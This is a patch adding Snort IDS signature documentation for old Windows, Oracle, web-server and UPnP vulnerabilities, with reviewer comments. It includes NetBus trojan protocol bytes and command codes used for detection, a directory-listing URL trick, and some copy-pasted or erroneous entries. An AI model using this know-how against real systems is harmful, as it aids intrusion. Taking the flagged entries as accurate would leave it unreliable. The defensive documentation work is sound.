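Review bot: The Attack Scenarios text ("An attacker may make a request for a file with an overly long filename via a network share") does not obviously match the Detailed Information, which describes a malformed request to an RPC port; if the overlong filename is carried inside the DCOM request, say so, otherwise the two sections describe different attacks. "Expoit code exists" under Ease of Attack should be "Exploit code exists", and Additional References is empty even though Corrective Action presupposes a vendor patch; the Microsoft security bulletin for this RPC DCOM flaw should be linked.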
--- /dev/null
+++ b/doc/signatures/3414.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3414
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
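Review bot: This file is a verbatim copy of 3271.txt from Summary through Additional References, including the "Expoit code exists" typo, so nothing tells the reader how SID 3414 differs from SID 3271 (different RPC interface, transport or byte pattern); the Detailed Information should state what this particular rule matches on. The Attack Scenarios/Detailed Information mismatch noted for 3271 applies here as well.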
--- /dev/null
+++ b/doc/signatures/2625.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2625
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "unregister_user_repgroup" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "privilege_type" variable
+to cause the overflow. The result could permit the attacker to gain
+escalated privileges and run code of their choosing. This attack
+requires an attacker to logon to the database with a valid username
+and password combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+ 
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck94.html
+
+--
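Review bot: "a Oracle database implementation" in the Summary should be "an Oracle database implementation". The third Detailed Information paragraph ("make sure that the variable $ORACLE_PORTS is set to a value of "any"") is sensor configuration, not vulnerability detail; 1687.txt in this same patch places the equivalent advice under False Negatives and names snort.conf, which is clearer and should be mirrored here. Also, the Summary names the procedure "unregister_user_repgroup" while Attack Scenarios names the variable "privilege_type" without connecting the two; if privilege_type is a parameter of that procedure, one clause saying so ties the sections together. The Affected Systems entry is indented with spaces where the other files use a tab.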
--- /dev/null
+++ b/doc/signatures/3329.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3329
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
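Review bot: Like 3414.txt, this file duplicates 3271.txt word for word (down to "Expoit code exists" and the empty Additional References), so three SIDs (3271, 3329 and 3414) now share one description that never says what distinguishes them; each file's Detailed Information should identify the specific RPC DCOM request or interface it detects, and the typo should be fixed in all three.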
--- /dev/null
+++ b/doc/signatures/1424.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+1424
+
+--
+Summary:
+This event is generated when suspicious shell code is detected in
+network traffic.
+
+--
+Impact:
+Denial of Service (DoS) possible execution of arbitrary code.
+
+--
+Detailed Information:
+This event is generated when suspicious shell code is detected. Many
+buffer overflow attacks contain large numbers of NOOP instrucions to pad
+out the request. Other attacks contain specific shell code sequences
+directed at certain applications or services.
+
+The shellcode in question may also use Unicode encoding.
+
+--
+Affected Systems:
+	Any software running on x86 architecture.
+
+--
+Attack Scenarios:
+An attacker may exploit a DCERPC service by sending shellcode in the RPC
+data stream. Sending large amounts of data to the Microsoft Workstation
+service can cause a buffer overflow condition in the logging function
+thus presenting an attacker with the opportunity to issue a DoS attack
+or in some cases, to execute code of their choosing.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+False positives may be generated by binary file transfers.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Make sure the target host has all current patches applied and has the
+latest software versions installed.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
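Review bot: The Impact line "Denial of Service (DoS) possible execution of arbitrary code." is missing punctuation or a conjunction between the two outcomes. In Detailed Information, "NOOP instrucions" should be "NOOP instructions", and the text alternates between "shell code" and "shellcode". The False Positives entry ("binary file transfers") is the most actionable line in the file for an analyst and could say which protocols (for example file downloads over HTTP or SMB) are the usual benign source, if that is known.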
--- /dev/null
+++ b/doc/signatures/100000101.txt
@@ -0,0 +1,75 @@
+Rule: 
+
+--
+Sid: 
+100000101
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a buffer overflow 
+vulnerability present in the Adobe Acrobat/Acrobat Reader ActiveX control, 
+pdf.ocx.
+
+-- 
+
+Impact: 
+By using properly crafted packets, attackers may execute arbitrary code of 
+their choosing with the privileges of the user running the affected software.
+
+--
+Detailed Information:
+This rule detects attempts to overflow the heap of the Adobe Acrobat/Acrobat 
+Reader ActiveX control, pdf.ocx. URI requests of 1,050 bytes or greater which 
+are received by this control will cause a buffer overflow and allow arbitrary 
+code execution with the privileges of the affected user. This rule is used in 
+conjunction with SID 100000100.
+
+--
+Affected Systems:
+Adobe Acrobat 5.0
+Adobe Acrobat 5.0.5
+Adobe Acrobat 6.0
+Adobe Acrobat 6.0.1
+Adobe Acrobat Reader 5.0
+Adobe Acrobat Reader 5.0.5
+Adobe Acrobat Reader 5.1
+Adobe Acrobat Reader 6.0
+Adobe Acrobat Reader 6.0.1
+
+--
+
+Attack Scenarios: 
+A web browser or automated script may be used to exploit this vulnerability.
+
+-- 
+
+Ease of Attack: 
+Simple, as simply typing a long URI into a web browser will suffice.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+Upgrade to Adobe Acrobat/Acrobat Reader 6.0.2.
+An alternate workaround is available: disable "Display PDF in browser" under 
+Edit -> Preferences.
+
+--
+Contributors: 
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+http://www.adobe.com/support/downloads/thankyou.jsp?ftpID=2589&fileID=2433
+
+--
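Review bot: The only Additional References entry is a download link ("thankyou.jsp?ftpID=2589&fileID=2433") rather than an advisory, so it does not tell the reader what was fixed; the Adobe advisory or CVE entry for the pdf.ocx overflow should be cited, with the download link kept under Corrective Action if at all. "Simple, as simply typing a long URI into a web browser will suffice" repeats "simple"; "Simple. Typing a long URI into a web browser suffices." reads better. Detailed Information says the rule "is used in conjunction with SID 100000100" without saying what that rule covers; one clause would help. Blank lines around several "--" separators are placed inconsistently with the other files.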
--- /dev/null
+++ b/doc/signatures/1188.txt
@@ -0,0 +1,75 @@
+Rule:  
+
+--
+Sid:
+1188
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a
+vulnerability in some versions of Netscape Enterprise Server.
+ 
+--
+Impact:
+Information leak which could provide an attacker with the data needed to
+launch further attacks or gain more detailed information about your web server.
+
+--
+Detailed Information:
+A user can see a directory listing by appending a Web Publishing command
+to the end of a directory URL, for example: "http://www.sun.com/?wp-start-ver".
+
+This exploit will work on Netscape Enterprise Server regardless of
+directory indexing settings.  
+
+It will not work on iPlanet Web Server if directory indexing is set to
+"none" or "fancy" (the default). Web Publishing need not be enabled for
+this exploit to work.
+
+--
+Affected Systems:
+	Netscape Enterprise Server 3.0, 3.51 and 3.6
+
+-- 
+Attack Scenarios:
+The gathering of information such as directory listings is valuable when
+planning to attack a web server. 
+
+--
+Ease of Attack:
+Simple. No exploit software required however, an automated tool for
+scanning exists as does an exploit script.
+
+--
+False Positives:
+A web server that uses URLs which contain web publishing commands.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Disable directory indexing. For earlier versions of Netscape Enterprise
+Server, this may not fix the problem. On iPlanet, you can also change
+the indexing type to "fancy".
+
+To fix the potential DOS vulnerability, upgrade to at least iWS 4.1 SP8.
+
+--
+Contributors:
+Snort documentation contributed by Kevin Peuhkurinen
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+iPlanet Knowledge Base Article 4302:
+http://knowledgebase.iplanet.com/ikb/kb/articles/4302.html 
+
+iPlanet Knowledge Base Article 7761:
+http://knowledgebase.iplanet.com/ikb/kb/articles/7761.html 
+
+--
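Review bot: Corrective Action says "To fix the potential DOS vulnerability, upgrade to at least iWS 4.1 SP8", but no DoS is described in Impact or Detailed Information, which cover only the directory-listing information leak; either the Impact section is missing an outcome or this sentence belongs to a different rule's documentation. The two knowledge-base URLs under Additional References carry trailing whitespace that some tools will include in the link; trim it. "Simple. No exploit software required however, an automated tool..." needs a comma before "however" and the sentence split.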
--- /dev/null
+++ b/doc/signatures/100000852.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000852
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "IceWarp" application running on a webserver. Access to the file "include.php" using a remote file being passed as the "lang_settings" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "lang_settings" parameter in the "include.php" script used by the "IceWarp" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using IceWarp
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
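Review bot: The third Detailed Information paragraph and the Attack Scenarios text ("An attacker can access an authentication mechanism and supply his/her own credentials") are boilerplate about credential checking that does not describe a remote file include via the "lang_settings" parameter of "include.php", which the Summary and first paragraph correctly describe; they appear to have been carried over from the PHPHG document earlier in this patch (the same "running ona web server" typo is present) and should be replaced with a sentence on how the included remote file ends up executed by the application. Also: "an exploitation attempt has been attempted" is tautological, the file begins with two blank lines before "Rule:", and the "--" separators after "Sid:", "Affected Systems:" and "Contributors:" lack the blank line used elsewhere.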
--- /dev/null
+++ b/doc/signatures/1987.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+1987
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a flaw in the
+X Windows Font Service.
+
+--
+Impact:
+Arbitrary code execution. Denial of Service.
+
+--
+Detailed Information:
+Certain versions of XFS distributed with Sun's Solaris are vulnerable to
+a remote buffer overflow. The Dispatch() routine within fs.auto does not
+provide adequate bounds-checking.
+
+--
+Affected Systems:
+	Sun Solaris 2.5.1 to 9 (Update 2)
+
+--
+Attack Scenarios:
+An attacker must have access to tcp port 7100. The attacker can then 
+either cause XFS to crash or run code as user "nobody".
+
+--
+Ease of Attack:
+Difficult
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disable XFS in the inetd configuration file (normally /etc/inetd.conf 
+under line fs.auto).
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+Nessus:
+http://cgi.nessus.org/plugins/dump.php3?id=11188
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1317
+
+--
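Review bot: "X Windows Font Service" in the Summary is not the service's name; the Solaris daemon is the X Font Server (xfs, launched from the fs.auto entry in inetd.conf, as Corrective Action correctly states), and using that name in the Summary lets the reader connect it to "XFS" and "fs.auto" in the later sections. Otherwise this file is a good model for the rest of the patch: it names the vulnerable routine (Dispatch()), the port (tcp 7100), the privilege gained ("nobody") and a CVE reference (CAN-2002-1317).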
--- /dev/null
+++ b/doc/signatures/3136.txt
@@ -0,0 +1,77 @@
+Rule: 
+
+--
+Sid: 
+3136
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft systems using Server Message Block (SMB).
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+SMB is a client - server protocol used in sharing resources such as
+files, printers, ports, named pipes and other things, between machines
+on a network.
+
+A vulnerability in the Microsoft implementation of SMB exists due to a
+programming error which may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain unauthorized access to the target host.
+
+A malicious attacker can exploit the vulnerability by sending a
+malicious response from a server in response to a client request using
+SMB.
+
+--
+Affected Systems:
+	Microsoft Windows 2003
+	Microsoft Windows 2000
+	Microsoft Windows XP
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message from the server
+containing code of their choosing to be run on the client.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+Turn off windows file and print services.
+
+Use Samba as an alternative.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+eEye:
+http://www.eeye.com/html/research/advisories/AD20050208.html
+
+--
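Review bot: The Corrective Action ("Turn off windows file and print services. Use Samba as an alternative.") does not address the flaw described, which Detailed Information says is triggered by "a malicious response from a server in response to a client request"; disabling the host's own shares does not stop its SMB client from connecting to a hostile server, and Samba is itself an SMB implementation. Suggest keeping "Apply the appropriate vendor supplied patches" and, if a workaround is wanted, restricting outbound SMB (TCP 139 and 445, the ports cited in the RPC DCOM files of this patch) to untrusted networks. Minor: "client - server protocol" should be "client-server protocol" and "A malicious attacker" is redundant.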
--- /dev/null
+++ b/doc/signatures/2756.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2756
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure comment_on_update_resolution
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
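Review bot: Detailed Information breaks a line before the period in "vulnerability in the procedure comment_on_update_resolution / . This procedure is included in / dbms_repcat.", which looks like a template substitution artefact; it should read as one sentence. "Oracle Oracle9i" under Affected Systems repeats the vendor name, and "Apply the appropriate vendor supplied patch" under Corrective Action lacks a period. The ORACLE_PORTS negotiation caveat that 1687.txt documents under False Negatives applies to this rule too and could be referenced so analysts know why the rule may miss traffic on a negotiated port.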
--- /dev/null
+++ b/doc/signatures/1687.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid: 1687
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an Oracle database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an Oracle database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+Oracle servers running on a Windows platform may listen on any arbitrary
+port. Change the $ORACLE_PORTS variable in snort.conf to "any" if this
+is applicable to the protected network.
+
+--
+
+Attack Scenarios: 
+Simple. These are Oracle database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+Configure your ORACLE_PORTS variable correctly for the environment you are in. 
+In many situations ORACLE negotiates a communication port. This means that 1521 
+and 1526 are not used for communication during the entire transaction. A new 
+port is negotiated after the initial connect message, all communication after 
+that uses this other port. If you are in an environment such as this, you should 
+set ORACLE_PORTS to "any" in snort.conf. 
+ 
+Otherwise, there are no known false negatives.
+
+-- 
+
+Corrective Action: 
+Use a firewall to disallow direct access to the Oracle database from sources external to the protected network.
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
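Review bot: "This connection can either be a legitimate telnet connection or the result of spawning a remote shell" under Detailed Information has no antecedent (nothing earlier in the file mentions a connection) and reads as if copied from a shell-command rule rather than an Oracle rule; it should be dropped or rewritten around the Oracle session. The Attack Scenarios entry ("Simple. These are Oracle database commands.") gives the Ease of Attack answer rather than a scenario. The False Negatives section usefully explains the port negotiation issue (1521 and 1526 are not used after the initial connect) and is worth keeping. Formatting: "Sid: 1687" sits on one line unlike every other file, and "Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise" under Corrective Action lacks a comma before "then" and a closing period.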
--- /dev/null
+++ b/doc/signatures/3009.txt
@@ -0,0 +1,115 @@
+Rule: 
+
+--
+Sid: 
+3009
+
+-- 
+Summary:
+This event is generated when an attempt is made to request a connection
+using the NetBus Pro 2.0 Trojan.
+
+-- 
+Impact: 
+If connected, the attacker could execute files remotely on your computer,
+capture an image of your desktop, send messages, steal your passwords,
+open and close your CD-ROM, play sounds, print documents, and even
+shutdown or reboot your computer, among many other things. The attacker
+will have almost total control of the PC should he connect successfully.
+
+--
+Detailed Information:
+NetBus Pro 2.0 incorporates its own protocol. It uses port 20034 by
+default, but it can be changed by the attacker.
+
+Its packets included a ten byte header followed by the packet's encrypted
+data. The first two bytes of the header are static: 42 4E.  The next two
+bytes indicate the size of the packet, followed by two bytes
+for the version number, followed by two random bytes, and the final ninth
+and tenth byte make up the command code. To look for an attack from one of
+these functions, the header of the suspicious packet will look like:
+
+	42 4E S1 S2 V1 V2 R1 R2 C1 C2
+
+NOTE: S1 and S2 are size byte one and size byte two. V1 and V2 are version
+number byte one and version number byte two. R1 and R2 are random bytes
+one and two. C1 and C2 are the command code bytes.
+
+The following is a list of the command codes for many of Net Bus Pro 2.0's
+functions:
+
+	Capture Desktop Image: 41 01
+	CD-ROM Open and Close: 60 01
+	Client Chat: 08 00
+	Execute File: 30 01
+	Reading Directory Listing: 50 00
+	Directory Traversal: 51 00
+	Go To URL: 33 01
+	Keyboard Tricks: 61 01
+	Keylogger: 40 01
+	Mouse Tricks: 65 01
+	Open Document: 33 01
+	Play Sound: 31 01
+	Plugin Manager: 90 00
+	Print Document: 34 01
+	Record Sound: 43 01
+	Redirect Application: 10 01
+	Redirect Port: 00 01
+	Registry Manager: 70 00
+	Remote Control: 73 01 and 72 01
+	Send Message: 40 00
+	Send Text: 64 01
+	Show Image: 32 01
+	Sound System: 80 00
+	System Administrator: 21 00
+	System Information: 30 00
+	Windows Manager: 60 00
+	Any Windows Exit Function(Shutdown, Reboot, etc.): 50 01
+
+--
+Affected Systems:
+Windows 95/98/ME/NT/2000
+
+--
+Attack Scenarios: 
+The victim must first install the server. Be wary of suspicious files
+because they often can be backdoor programs in disguise.
+
+Once the victim mistakenly installs the server program, the attacker
+will usually employ an IP scanner program to find the IP addresses of
+victims that have installed the program. The attacker then enters the IP
+address, port number (which is assigned to the server program by the
+attacker: default is 20034), and presses the connect button to gain access
+to the targeted system.
+
+-- 
+Ease of Attack: 
+Simple. Trojan Horse programs are widely available.
+
+-- 
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+-- 
+Corrective Action: 
+In order to get rid of it, you will have to uninstall the program,
+deleting the folder and its contents or uninstalling it from the
+Add/Remove Programs option under the control panel. The Trojan usually
+does not attempt to hide itself, making the process of finding it much easier.
+
+--
+Contributors:
+Sourcefire Research Team
+Ricky Macatee <rmacatee@sourcefire.com> 
+
+-- 
+Additional References:
+
+Dark-E:
+http://www.dark-e.com/archive/trojans/netbus/200/index.shtml
+
+--
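Review bot: the command code table assigns the same code to two different functions, `Go To URL: 33 01` and `Open Document: 33 01`; since the rule keys on the ninth and tenth header bytes, one of these entries is wrong and the list should be verified against the protocol reference before it is shipped. Also fix `Its packets included a ten byte header` to "include", and spell the product consistently ("Net Bus Pro 2.0" in the list heading versus "NetBus Pro 2.0" everywhere else).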
--- /dev/null
+++ b/doc/signatures/1388.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+1388
+
+--
+Summary:
+This event is generated when a remote user attempts to send a NOTIFY directive with an overly long Location URL to an internal host's Universal Plug and Play (UPnP) server.
+
+--
+Impact:
+Attempted administrator access.  A successful attack may cause a denial of service or permit the execution of arbitrary code with administrator privileges.
+
+--
+Detailed Information:
+The UPnP is used to find network-based devices.  Specifically, UPnP NOTIFY directives are employed to advertise the existence of UPnP devices on the network.  A vulnerability exists that permits a malformed NOTIFY directive with an overly long Location URL to cause a buffer overflow on the remote host listening on UPnP.  The buffer overflow attack may permit the execution of arbitrary code on the host with administrator privileges.
+
+--
+
+Affected Systems:
+Microsoft Windows 98, 98SE, ME, XP
+
+--
+Attack Scenarios:
+An attacker may obtain craft a malformed NOTIFY directive to execute arbitrary code on the victim host.
+
+--
+Ease of Attack:
+Simple. Exploit code is freely available.
+
+--
+False Positives:
+This event will be generated if external hosts are permitted to query for UPnP devices.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Block inbound UPnP traffic.
+
+--
+Contributors:
+Original rule writer unknown.
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0876
+
+--
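Review bot: the Attack Scenarios sentence `An attacker may obtain craft a malformed NOTIFY directive` has a stray word; read "An attacker may craft a malformed NOTIFY directive". `The UPnP is used to find network-based devices` should drop the article. The reference still uses the retired candidate prefix (`CAN-2001-0876`); the identifier is now CVE-2001-0876 and the cve.mitre.org lookup accepts that form, so update the URL.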
--- /dev/null
+++ b/doc/signatures/1490.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+1490
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a weakness in a php application. 
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in php applications.
+
+The attacker may be trying to gain information on the php implementation on the host, this may be the prelude to an attack against that host using that information.
+
+--
+Affected Systems:
+Any host using php.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the php application on the host. The attacker might then gain administrator access to the site or database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the php implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
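Review bot: nothing in this file says what the rule actually matches; there is no file name, URI or request pattern anywhere, so "exploit a weakness in a php application" is unverifiable and the "None Known" false-positive claim cannot be judged. State the matched request the way the other entries in this patch do (compare the `babInstallPath` entry for 100000390), and either fill the empty Additional References section or remove its blank lines.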
--- /dev/null
+++ b/doc/signatures/2904.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2904
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure create_snapshot_repobject
+. This procedure is included in
+sys.dbms_repcat_sna.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
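Review bot: the procedure name is broken across lines with the full stop stranded on its own line (`vulnerability in the procedure create_snapshot_repobject` / `. This procedure is included in` / `sys.dbms_repcat_sna.`); join this into one sentence. `Oracle Oracle9i` under Affected Systems duplicates the vendor name. Additional References is empty although the text calls this a known vulnerability; add the vendor alert so that "Apply the appropriate vendor supplied patch" points at something.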
--- /dev/null
